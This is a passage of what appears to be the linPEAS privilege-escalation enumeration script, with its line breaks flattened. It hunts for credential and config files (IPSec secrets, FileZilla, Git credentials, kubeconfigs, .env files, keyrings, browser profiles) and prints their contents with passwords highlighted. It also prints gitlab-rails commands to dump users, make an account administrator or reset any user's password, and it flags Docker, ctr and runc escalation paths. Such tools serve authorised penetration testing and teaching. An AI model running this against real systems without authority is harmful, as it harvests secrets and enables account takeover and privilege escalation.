"gvm-tools\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_IPSEC" ] || [ "$DEBUG" ]; then print_2title "Analyzing IPSec Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "ipsec.secrets"; fi; fi; printf "%s"
"$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g";
done; echo ""; if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "ipsec.conf"; fi; fi; printf "%s"
"$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_IRSSI" ] || [ "$DEBUG" ]; then print_2title
"Analyzing IRSSI Files (limit 70)" if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E
\"\.irssi$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".irssi"; fi; fi;
printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.irssi$,${SED_RED},"; find "$f" -name "config"
| while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff"
2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo
"";done; echo ""; fi if [ "$PSTORAGE_KEYRING" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Keyring Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "keyrings"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E
"keyrings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,keyrings$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" |
grep -E \"\.keyring$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"*.keyring"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.keyring$,${SED_RED},";
done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "*.keystore"; fi; fi; printf "%s"
"$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "*.jks"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E
"\.jks$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.jks$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_FILEZILLA" ] || [
"$DEBUG" ]; then print_2title "Analyzing Filezilla Files (limit 70)" if ! [
"`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "filezilla"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" |
grep -E "filezilla$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,filezilla$,${SED_RED},"; find "$f" -name "sitemanager.xml" | while read ff;
do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff"
2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E}
"s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done;
echo ""; if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "filezilla.xml"; fi; fi; printf
"%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; if
! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s"
"$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo "";
fi if [ "$PSTORAGE_BACKUP_MANAGER" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Backup Manager Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "storage.php"; fi; fi; printf "%s"
"$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null
| grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed
-${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "database.php"; fi; fi; printf "%s"
"$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -E
"'pass'|'password'|'user'|'database'|'host'" | sed -${E}
"s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; fi ##-- SI)
passwd files (splunk) SPLUNK_BIN="$(command -v splunk 2>/dev/null)" if [
"$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then print_2title
"Searching uncommon passwd files (splunk)" if [ "$SPLUNK_BIN" ]; then echo
"splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi
printf "%s\n" "$PSTORAGE_SPLUNK" | grep -v ".htpasswd" | sort | uniq | while
read f; do if [ -f "$f" ] && ! [ -x "$f" ]; then echo "passwd file: $f" | sed
"s,$f,${SED_RED}," cat "$f" 2>/dev/null | grep
"'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E}
"s,password|pass|user|database|host|\$,${SED_RED}," fi done echo "" fi if [
"$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then print_2title "Analyzing
kcpassword files" print_info
"https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword"
printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do echo "$f" | sed -${E}
"s,.*,${SED_RED}," base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," done
echo "" fi ##-- SI) Gitlab if [ "$(command -v gitlab-rails)" ] || [ "$(command
-v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then
print_2title "Searching GitLab related files" # Check gitlab-rails if [
"$(command -v gitlab-rails)" ]; then echo "gitlab-rails was found. Trying to
dump users..." gitlab-rails runner 'User.where.not(username:
"peasssssssss").each { |u| pp u.attributes }' | sed -${E}
"s,email|password,${SED_RED}," echo "If you have enough privileges, you can make
an account under your control administrator by running: gitlab-rails runner
'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE;
user.save!'" echo "Alternatively, you could change the password of any user by
running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\");
user.password = \"pass_peass_pass\"; user.password_confirmation =
\"pass_peass_pass\"; user.save!'" echo "" fi if [ "$(command -v gitlab-backup)"
]; then echo "If you have enough privileges, you can create a backup of all the
repositories inside gitlab using 'gitlab-backup create'" echo "Then you can get
the plain-text with something like 'git clone
\@hashed/19/23/14348274[...]38749234.bundle'" echo "" fi # Check gitlab files
printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do if echo $f |
grep -q secrets.yml; then echo "Found $f" | sed "s,$f,${SED_RED}," cat "$f"
2>/dev/null | grep -Iv "^$" | grep -v "^#" elif echo $f | grep -q gitlab.yml;
then echo "Found $f" | sed "s,$f,${SED_RED}," cat "$f" | grep -A 4
"repositories:" elif echo $f | grep -q gitlab.rb; then echo "Found $f" | sed
"s,$f,${SED_RED}," cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E}
"s,email|user|password,${SED_RED}," fi echo "" done echo "" fi if [
"$PSTORAGE_GITHUB" ] || [ "$DEBUG" ]; then print_2title "Analyzing Github Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s"
"$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E
"\.gitconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.gitconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo
""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf
"%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo "";
if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E
"\.git$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.git$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_SVN" ] || [ "$DEBUG"
]; then print_2title "Analyzing Svn Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found ".svn"; fi; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.svn$,${SED_RED},"; ls
-lRA "$f";done; echo ""; fi if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then
print_2title "Analyzing PGP-GPG Files (limit 70)" ( (command -v gpg && gpg
--list-keys) || echo_not_found "gpg") 2>/dev/null ( (command -v netpgpkeys &&
netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null (command -v
netpgp || echo_not_found "netpgp") 2>/dev/null if ! [ "`echo
\"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E
"\.pgp$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if
! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E
"\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if
! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep
-E "\.gnupg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
fi if [ "$PSTORAGE_CACHE_VI" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Cache Vi Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E
\"\.swp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.swp"; fi; fi;
printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "*.viminfo"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" |
grep -E "\.viminfo$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.viminfo$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_WGET" ] || [
"$DEBUG" ]; then print_2title "Analyzing Wget Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found ".wgetrc"; fi; fi; printf "%s" "$PSTORAGE_WGET" | grep -E
"\.wgetrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#"
| sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo
""; fi ##-- SI) containerd installed if ! [ "$SEARCH_IN_FOLDER" ]; then
containerd=$(command -v ctr) if [ "$containerd" ] || [ "$DEBUG" ]; then
print_2title "Checking if containerd(ctr) is available" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation"
if [ "$containerd" ]; then echo "ctr was found in $containerd, you may be able
to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," ctr image list
2>&1 fi echo "" fi fi ##-- SI) runc installed if ! [ "$SEARCH_IN_FOLDER" ]; then
runc=$(command -v runc) if [ "$runc" ] || [ "$DEBUG" ]; then print_2title
"Checking if runc is available" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation"
if [ "$runc" ]; then echo "runc was found in $runc, you may be able to escalate
privileges with it" | sed -${E} "s,.*,${SED_RED}," fi echo "" fi fi #-- SI)
Docker if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then print_2title "Searching
docker files (limit 70)" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation"
printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do ls -l "$f"
2>/dev/null if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then echo "Docker
related socket ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi done
echo "" fi if [ "$PSTORAGE_KUBERNETES" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Kubernetes Files (limit 70)" (env || set) | grep -Ei
"kubernetes|kube" | grep -v "PSTORAGE_KUBERNETES|USEFUL_SOFTWARE" | sed -${E}
"s,kubernetes|kube,${SED_RED}," if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E
\"kubeconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubeconfig"; fi;
fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubeconfig$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubeconfig$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E}
"s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"bootstrap-kubeconfig$\"`" ]; then if
[ "$DEBUG" ]; then echo_not_found "bootstrap-kubeconfig"; fi; fi; printf "%s"
"$PSTORAGE_KUBERNETES" | grep -E "bootstrap-kubeconfig$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,bootstrap-kubeconfig$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E}
"s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet-kubeconfig$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "kubelet-kubeconfig"; fi; fi; printf "%s"
"$PSTORAGE_KUBERNETES" | grep -E "kubelet-kubeconfig$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,kubelet-kubeconfig$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E}
"s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet\.conf$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "kubelet.conf"; fi; fi; printf "%s"
"$PSTORAGE_KUBERNETES" | grep -E "kubelet\.conf$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,kubelet\.conf$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E}
"s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" |
grep -E "psk\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KUBERNETES\" |
grep -E \"\.kube.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".kube*";
fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "\.kube.*$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.kube.*$,${SED_RED},"; find "$f"
-name "config" | while read ff; do ls -ld "$ff" | sed -${E}
"s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";done;
echo ""; if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s"
"$PSTORAGE_KUBERNETES" | grep -E "kubelet$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "config.yaml"
| while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat
"$ff" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find
"$f" -name "kubeadm-flags.env" | while read ff; do ls -ld "$ff" | sed -${E}
"s,kubeadm-flags.env,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done;
echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E
\"kube-proxy$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kube-proxy"; fi;
fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kube-proxy$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,kube-proxy$,${SED_RED},"; done; echo
""; if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "kubernetes"; fi; fi; printf "%s"
"$PSTORAGE_KUBERNETES" | grep -E "kubernetes$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,kubernetes$,${SED_RED},"; find "$f" -name
"admin.conf" | while read ff; do ls -ld "$ff" | sed -${E}
"s,admin.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find
"$f" -name "controller-manager.conf" | while read ff; do ls -ld "$ff" | sed
-${E} "s,controller-manager.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv
"^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done;
echo "";find "$f" -name "scheduler.conf" | while read ff; do ls -ld "$ff" | sed
-${E} "s,scheduler.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" |
sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo
"";done; echo ""; fi if [ "$PSTORAGE_FIREFOX" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Firefox Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found ".mozilla"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E
"\.mozilla$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo
""; if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "Firefox"; fi; fi; printf "%s"
"$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_CHROME" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Chrome Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "google-chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" |
grep -E "google-chrome$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done;
echo ""; if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "Chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME"
| grep -E "Chrome$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
fi if [ "$PSTORAGE_AUTOLOGIN" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Autologin Files (limit 70)" if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E
\"autologin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin"; fi;
fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do
ls -ld "$f" 2>/dev/null | sed -${E} "s,autologin$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo "";
if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "autologin.conf"; fi; fi; printf "%s"
"$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo "";
fi #-- SI) S/Key athentication if (grep auth= /etc/login.conf 2>/dev/null | grep
-v "^#" | grep -q skey) || [ "$DEBUG" ] ; then print_2title "S/Key
authentication" printf "System supports$RED S/Key$NC authentication\n" if ! [ -d
/etc/skey/ ]; then echo "${GREEN}S/Key authentication enabled, but has not been
initialized" elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then echo
"${RED}/etc/skey/ is writable by you" ls -ld /etc/skey/ else ls -ld /etc/skey/
2>/dev/null fi fi echo "" #-- SI) YubiKey athentication if (grep "auth="
/etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ];
then print_2title "YubiKey authentication" printf "System supports$RED
YubiKey$NC authentication\n" if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ];
then echo "${RED}/var/db/yubikey/ is writable by you" ls -ld /var/db/yubikey/
else ls -ld /var/db/yubikey/ 2>/dev/null fi echo "" fi if [ "$PSTORAGE_SNMP" ]
|| [ "$DEBUG" ]; then print_2title "Analyzing SNMP Files (limit 70)" if ! [
"`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E
"snmpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"rocommunity|rwcommunity|extend.*|^createUser" | sed -${E}
"s,rocommunity|rwcommunity|extend.*|^createUser,${SED_RED},g"; done; echo ""; fi
if [ "$PSTORAGE_PYPIRC" ] || [ "$DEBUG" ]; then print_2title "Analyzing Pypirc
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found ".pypirc"; fi; fi; printf "%s"
"$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_POSTFIX" ] || [ "$DEBUG" ]; then print_2title "Analyzing Postfix
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s"
"$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" |
while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff"
2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E}
"s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; fi if [
"$PSTORAGE_LDAPRC" ] || [ "$DEBUG" ]; then print_2title "Analyzing Ldaprc Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found ".ldaprc"; fi; fi; printf "%s"
"$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if
[ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then print_2title "Analyzing Env Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env.*$\"`" ]; then if
[ "$DEBUG" ]; then echo_not_found ".env*"; fi; fi; printf "%s" "$PSTORAGE_ENV" |
grep -E "\.env.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.env.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#"
| sed -${E}
"s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB]|[pP][rR][iI][vV][aA][tT][eE]|[kK][eE][yY],${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_MSMTPRC" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Msmtprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep
-E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi;
fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E}
"s,user.*|password.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_KEEPASS" ]
|| [ "$DEBUG" ]; then print_2title "Analyzing Keepass Files (limit 70)" if ! [
"`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "*.kdbx"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E
